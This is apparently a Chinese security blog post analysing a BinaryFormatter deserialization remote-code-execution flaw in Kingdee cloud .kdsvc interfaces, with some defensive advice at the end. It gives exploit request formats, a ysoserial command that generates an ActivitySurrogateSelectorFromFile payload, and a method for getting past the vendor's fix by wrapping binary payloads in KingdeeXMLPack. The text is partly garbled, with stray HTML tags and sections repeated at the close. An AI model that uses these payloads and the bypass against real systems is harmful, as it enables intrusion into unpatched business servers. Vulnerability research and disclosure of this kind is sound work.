某云反序列化漏洞分析与绕过技术研究<\/h1>

0x00 漏洞概述<\/h2>
本文详细分析某云系统存在的反序列化漏洞及其绕过技术，该漏洞存在于以`.kdsvc<\/code>结尾的接口中，攻击者可通过精心构造的序列化数据实现远程代码执行。<\/p>`

0x01 调试环境搭建<\/h2>
所需工具<\/h3>

某云系统环境（参照网络安装教程搭建）<\/li>
dnSpy .NET调试工具<\/li>
<\/ul>
调试步骤<\/h3>

定位程序集<\/strong>：搜索dll文件定位exe程序<\/li>
附加进程<\/strong>：在dnSpy中选择"调试"→"附加到进程"<\/li>
搜索程序集<\/strong>：通过"调试"→"窗口"→"模块"查找目标dll<\/li>
断点调试<\/strong>：在关键方法设置断点<\/li>
<\/ol>
注意<\/em>：若遇到"无法获取局部变量或参数的值"错误，需：<\/p>

创建ini文件禁用编译优化<\/li>
配置相关环境变量<\/li>
重启IIS服务<\/li>
<\/ul>
0x02 漏洞原理分析<\/h2>
请求处理流程<\/h3>


系统通过web.config<\/code>配置处理.kdsvc<\/code>请求：<\/p>
<handlers><\/span>
<\/span><\/span>  <add<\/span> path=<\/span>"*kdsvc"<\/span> verb=<\/span>"*"<\/span> type=<\/span>"xxx,xxx"<\/span>\/><\/span>
<\/span><\/span><\/handlers><\/span>
<\/span><\/span><\/code><\/pre><\/li>

请求由Kingdee.BOS.ServiceFacade.KDServiceFx.KDServiceHandler<\/code>处理，生成KDSVCHandler<\/code>实例<\/p>
<\/li>

关键处理流程：<\/p>

RequestExtractor#Creat<\/code>：处理HTTP请求，判断方法和格式<\/li>
RequestExcuteRuntime#StartRequest<\/code>：处理请求逻辑<\/li>
ServiceTypeManager#BuidServiceType<\/code>：构建服务类型<\/li>
RequestExcuteRuntime.pipeline.ExcuteRequest<\/code>：执行请求校验<\/li>
<\/ul>
<\/li>
<\/ol>
反序列化触发点<\/h3>


参数处理位于RequestExtractor#GetServiceParameters<\/code>，支持两种payload格式：<\/p>
{"parameters"<\/span>: "[\"payload\"]"<\/span>}
<\/span><\/span>{"ap*"<\/span>: "payload"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

序列化处理由SerializerProxy<\/code>类完成，当format=3<\/code>时使用BinaryFormatter<\/code>反序列化<\/p>
<\/li>

最终通过BinaryFormatterProxy#Deserialize<\/code>调用不安全的BinaryFormatter.Deserialize<\/code>方法<\/p>
<\/li>
<\/ol>
0x03 漏洞利用方法<\/h2>
利用条件<\/h3>


目标类需满足：<\/p>

位于Kingdee.BOS.ServiceFacade.ServicesStub<\/code>等程序集<\/li>
构造函数支持传递KDServiceContext<\/code>类型参数<\/li>
参数类型不为string<\/code>、int<\/code>等基础类型<\/li>
<\/ul>
<\/li>

示例可利用类：<\/p>
SaveBizTipsInfos(string<\/span> bizHost, List<IBizTipsInfos> tips)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
利用方式<\/h3>


使用ap<\/code>参数格式：<\/p>
{"ap0"<\/span>: "base64_encoded_payload"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用parameters<\/code>参数格式：<\/p>
{"parameters"<\/span>: "[\"dummy\", \"base64_encoded_payload\"]"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用ysoserial生成payload：<\/p>
ysoserial.exe -c "a.cs;System.Windows.Forms.dll;System.Web.dll;System.dll"<\/span> -f BinaryFormatter -o base64 -g ActivitySurrogateSelectorFromFile
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 修复与绕过分析<\/h2>
官方修复方案<\/h3>


启用金蝶数据签名校验格式：<\/p>
<add<\/span> key=<\/span>"KDSVCDefaultFormat"<\/span> value=<\/span>"4"<\/span>\/><\/span>
<\/span><\/span><\/code><\/pre><\/li>

禁用二进制序列化：<\/p>
<add<\/span> key=<\/span>"EnabledKDSVCBinary"<\/span> value=<\/span>"false"<\/span>\/><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
绕过技术<\/h3>


修改format为4（KingdeeXml），但仍可通过KingdeeXMLPack<\/code>包装payload：<\/p>
{
<\/span><\/span>  "ap0"<\/span>: "<KingdeeXMLPack>BinaryPayload<\/KingdeeXMLPack>"<\/span>, 
<\/span><\/span>  "format"<\/span>: "4"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

绕过原理：<\/p>

系统仍会通过BinaryFormatterProxy<\/code>反序列化KingdeeXMLPack.Data<\/code>字段<\/li>
将二进制payload包装在XML格式中可绕过格式检查<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 防御建议<\/h2>

禁用BinaryFormatter<\/code>反序列化<\/li>
实现严格的类型检查白名单<\/li>
使用安全的序列化替代方案如JSON.NET<\/li>
对输入数据进行签名验证<\/li>
更新到最新补丁版本<\/li>
<\/ol>
附录：关键代码片段<\/h2>
\/\/ 反序列化入口<\/span>
<\/span><\/span>public<\/span> object<\/span> Deserialize(string<\/span> content, Type type)
<\/span><\/span>{
<\/span><\/span>    \/\/ 基础类型检查<\/span>
<\/span><\/span>    if<\/span> (type == typeof<\/span>(string<\/span>)) return<\/span> content;
<\/span><\/span>    if<\/span> (type == typeof<\/span>(int<\/span>)) return<\/span> int<\/span>.Parse(content);
<\/span><\/span>    \/\/ ...其他基础类型检查<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 最终调用不安全的BinaryFormatter<\/span>
<\/span><\/span>    return<\/span> this<\/span>.proxy.Deserialize(content, type);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ KingdeeXMLPack处理逻辑<\/span>
<\/span><\/span>KingdeeXMLPack kingdeeXMLPack = obj as<\/span> KingdeeXMLPack;
<\/span><\/span>if<\/span> (kingdeeXMLPack != null<\/span>)
<\/span><\/span>{
<\/span><\/span>    BinaryFormatterProxy binaryFormatterProxy = new<\/span> BinaryFormatterProxy(this<\/span>.encoding, false<\/span>);
<\/span><\/span>    obj = binaryFormatterProxy.Deserialize(kingdeeXMLPack.Data, type);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>

某云反序列化漏洞分析与绕过技术研究<\/h1>

0x00 漏洞概述<\/h2> 本文详细分析某云系统存在的反序列化漏洞及其绕过技术，该漏洞存在于以.kdsvc<\/code>结尾的接口中，攻击者可通过精心构造的序列化数据实现远程代码执行。<\/p>

0x02 漏洞原理分析<\/h2>

0x04 修复与绕过分析<\/h2>

0x00 漏洞概述<\/h2>
本文详细分析某云系统存在的反序列化漏洞及其绕过技术，该漏洞存在于以`.kdsvc<\/code>结尾的接口中，攻击者可通过精心构造的序列化数据实现远程代码执行。<\/p>`